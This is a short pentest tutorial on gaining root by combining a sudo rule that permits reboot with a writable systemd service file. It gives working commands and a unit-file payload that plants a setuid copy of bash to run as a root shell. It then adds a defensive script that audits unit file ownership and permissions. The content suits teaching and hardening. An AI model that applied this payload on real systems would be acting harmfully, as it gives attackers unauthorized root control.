Sudo Reboot Privilege Escalation

A sudo rule that permits the reboot command might be abused for privilege escalation (PrivEsc).

Last updated 1 year ago

Investigation

sudo -l

(ALL) NOPASSWD: /usr/sbin/reboot

If we can execute the "reboot" command as root, we can escalate privileges.

Exploitation

1. Find Service Config Files Which Are Writable

We need to look for system service config files that are writable.

find / -writable -name "*.service" 2>/dev/null

/etc/systemd/system/example.service

2. Insert a Payload

If we find a writable file, we can inject a payload into the ExecStart setting of the [Service] section.

# /etc/systemd/system/example.service
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/<username>/bash; chmod +xs /home/<username>/bash'

[Install]
WantedBy=multi-user.target

3. Reboot and Get a Root Shell

Now reboot as root.

sudo /usr/sbin/reboot

After the system reboots, the command in ExecStart is executed. We should then get a root shell by running the copied bash binary.

/home/<username>/bash -p
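
The technique above depends on a unit file that an account other than root can write, so the defensive counterpart is an ownership and permission audit of the unit directories. The script below is an added example, not part of the original page; the function names audit_units and audit_all and the list of directories are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original page): report systemd unit files,
# drop-ins and unit directories that an account other than root could modify.
# Function names and the directory list are assumptions of this example.

# audit_units DIR [OWNER_UID]
# Prints "<kind> <path>" per finding; returns 1 if there is any, else 0.
audit_units() {
    dir=$1
    owner=${2:-0}                     # UID expected to own everything (root)
    [ -d "$dir" ] || return 0

    findings=$(
        # Regular files only: symlinked units are checked at their target
        # when the directory that holds the target is scanned.
        find "$dir" -type f \
            \( -name '*.service' -o -name '*.timer' -o -name '*.socket' \
               -o -path '*.d/*.conf' \) \
            \( ! -user "$owner" -o -perm -0020 -o -perm -0002 \) \
            -exec printf 'unit-file %s\n' {} \;
        # A writable directory allows replacing a file that cannot be edited.
        find "$dir" -type d \
            \( ! -user "$owner" -o -perm -0020 -o -perm -0002 \) \
            -exec printf 'directory %s\n' {} \;
    )

    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# Scan the standard unit locations; non-zero exit means something to fix.
audit_all() {
    status=0
    for d in /etc/systemd/system /run/systemd/system \
             /usr/lib/systemd/system /lib/systemd/system; do
        audit_units "$d" || status=1
    done
    return "$status"
}

# Run the full scan only when asked, e.g. `sh audit.sh --all` as root.
if [ "${1:-}" = "--all" ]; then
    audit_all
fi
```

Each reported path should be returned to root ownership with mode 644 (755 for directories), after which the sudo reboot rule no longer gives a path to root through these files.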